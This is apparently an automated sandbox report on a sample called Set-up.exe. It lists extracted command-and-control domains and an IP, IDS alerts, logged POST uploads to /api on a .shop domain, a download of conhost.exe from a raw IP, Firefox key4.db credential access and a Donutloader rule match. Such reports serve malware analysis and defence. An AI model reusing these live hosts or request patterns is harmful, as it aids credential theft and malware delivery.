          Source: Malware configuration extractorURLs: bakedstusteeb.shop
          Source: Malware configuration extractorURLs: standartedby.shop
          Source: Malware configuration extractorURLs: worddosofrm.shop
          Source: Malware configuration extractorURLs: corehairydu.icu
          Source: Malware configuration extractorURLs: respectabosiz.shop
          Source: Joe Sandbox ViewIP Address: 147.45.47.81 147.45.47.81
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49735
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:56314
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:56315
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: worddosofrm.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: worddosofrm.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J0PC41K8W4FXK9GUKSTPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18178Host: worddosofrm.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8F9JUVKTD98FLYNGQWCQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8799Host: worddosofrm.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LQ7KQ0ZXPZEACXIL5P81AH845VEGG8TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20518Host: worddosofrm.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FX1DFU84BK80CT6OHR9I3CQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7167Host: worddosofrm.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ALCFCPHXC9MFFVET4DI3NYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7129Host: worddosofrm.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4Y5L8AKJLU3H5MK5B6ICOFB232B8L7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1322Host: worddosofrm.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3EC22CYO6BIE0TIXW6C3VNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1144Host: worddosofrm.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 117Host: worddosofrm.shop
          Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
          Source: global trafficDNS traffic detected: DNS query: corehairydu.icu
          Source: global trafficDNS traffic detected: DNS query: worddosofrm.shop
          Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
          Source: global trafficDNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: worddosofrm.shop
          Source: Set-up.exeString found in binary or memory: http://.css
          Source: Set-up.exeString found in binary or memory: http://.jpg
          Source: Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/
          Source: Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/V
          Source: Set-up.exe, 00000000.00000002.2074270649.0000000003BB9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2074191589.0000000003B9A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2073967140.0000000003B23000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072261487.0000000003BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe
          Source: Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe_
          Source: Set-up.exe, 00000000.00000002.2074270649.0000000003BB9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072261487.0000000003BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exeg
          Source: Set-up.exe, 00000000.00000002.2074270649.0000000003BB9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072261487.0000000003BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exes
          Source: Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/h
          Source: Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81:80/conhost.exe
          Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: Set-up.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072315309.0000000003B44000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2074065256.0000000003B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: Set-up.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
          Source: Set-up.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
          Source: Set-up.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
          Source: Set-up.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
          Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: Set-up.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: Set-up.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
          Source: Set-up.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: Set-up.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
          Source: Set-up.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
          Source: Set-up.exeString found in binary or memory: http://html4/loose.dtd
          Source: Set-up.exeString found in binary or memory: http://ocsp.comodoca.com0
          Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0
          Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0A
          Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0X
          Source: Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: Set-up.exeString found in binary or memory: http://ocsp.sectigo.com0
          Source: Set-up.exeString found in binary or memory: http://ocsp.sectigo.com0)
          Source: Set-up.exeString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: Set-up.exeString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: Set-up.exeString found in binary or memory: http://support.google.com/installer/
          Source: Set-up.exeString found in binary or memory: http://support.google.com/installer/%s?product=%s&error=%d
          Source: Set-up.exeString found in binary or memory: http://www.digicert.com/CPS0
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072209586.0000000003B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c(
          Source: Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: Set-up.exeString found in binary or memory: https://bitvise.com/versions/BvSshClient9
          Source: Set-up.exeString found in binary or memory: https://bitvise.com/versions/BvSshClient9sCould
          Source: Set-up.exeString found in binary or memory: https://bitvise.com/versions/BvSshServer9
          Source: Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: Set-up.exeString found in binary or memory: https://clients2.google.com/cr/report
          Source: Set-up.exeString found in binary or memory: https://crashpad.chromium.org/
          Source: Set-up.exeString found in binary or memory: https://crashpad.chromium.org/bug/new
          Source: Set-up.exeString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
          Source: Set-up.exeString found in binary or memory: https://dl.google.com/update2/installers/icons/
          Source: Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: Set-up.exeString found in binary or memory: https://m.google.com/devicemanagement/data/api
          Source: Set-up.exeString found in binary or memory: https://sectigo.com/CPS0
          Source: Set-up.exe, 00000000.00000003.1862856862.00000000063E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
          Source: Set-up.exe, 00000000.00000003.1894883673.00000000064AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: Set-up.exe, 00000000.00000003.1894883673.00000000064AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: Set-up.exe, 00000000.00000003.1862856862.00000000063DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: Set-up.exe, 00000000.00000003.1862856862.00000000063DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: Set-up.exeString found in binary or memory: https://update.googleapis.com/service/update2/json
          Source: Set-up.exeString found in binary or memory: https://update.googleapis.com/service/update2/jsonhttps://clients2.google.com/cr/reporthttps://m.goo
          Source: Set-up.exe, 00000000.00000003.1877863332.0000000006388000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1878766733.0000000006390000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1877968146.000000000638C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1878288103.0000000006390000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1877968146.000000000638F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1877863332.000000000638F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop/
          Source: Set-up.exe, 00000000.00000003.1877863332.0000000006388000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1877968146.000000000638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop/$
          Source: Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop/8
          Source: Set-up.exe, 00000000.00000003.1946322208.0000000003B9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946070873.0000000003B95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946226895.0000000003B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop/:
          Source: Set-up.exe, 00000000.00000003.1862387198.0000000003B90000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1862515516.0000000003B91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop/;8r
          Source: Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop/?
          Source: Set-up.exe, 00000000.00000003.1946322208.0000000003B9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946070873.0000000003B95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946226895.0000000003B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop/O
          Source: Set-up.exe, 00000000.00000003.1928541706.0000000003BB7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1862387198.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946322208.0000000003B9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946070873.0000000003B95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1942945051.0000000003BB7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1977264093.0000000003BB9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946226895.0000000003B9A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1877863332.000000000638F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1909557674.0000000003BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop/api
          Source: Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop/apibu
          Source: Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946322208.0000000003B9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946070873.0000000003B95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946226895.0000000003B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop/apier
          Source: Set-up.exe, 00000000.00000003.1960961934.0000000003BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop/apis
          Source: Set-up.exe, 00000000.00000003.1946226895.0000000003B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop:443/api
          Source: Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop:443/api2o4p.default-release/key4.dbPK
          Source: Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946322208.0000000003B9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946070873.0000000003B95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946226895.0000000003B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://worddosofrm.shop:443/api9
          Source: Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: Set-up.exe, 00000000.00000003.1894883673.00000000064AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: Set-up.exe, 00000000.00000003.1894883673.00000000064AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: Set-up.exe, 00000000.00000003.1894883673.00000000064AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: Set-up.exe, 00000000.00000003.1894883673.00000000064AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: Set-up.exe, 00000000.00000003.1894883673.00000000064AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49748 version: TLS 1.2
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05911C40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_05911C40
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05911C40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_05911C40
          Source: Set-up.exe, 00000000.00000003.1829704509.000000000639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_b00aa0e9-f
          Source: Set-up.exe, 00000000.00000003.1829704509.000000000639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_9291059b-c

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054C1BBB NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,0_2_054C1BBB
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F050C00_2_00F050C0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E6C6200_2_00E6C620
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F046200_2_00F04620
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F04A600_2_00F04A60
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E62C500_2_00E62C50
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E55DD00_2_00E55DD0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E61F700_2_00E61F70
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054703FB0_2_054703FB
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054C1BBB0_2_054C1BBB
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054915480_2_05491548
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054825740_2_05482574
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054975D80_2_054975D8
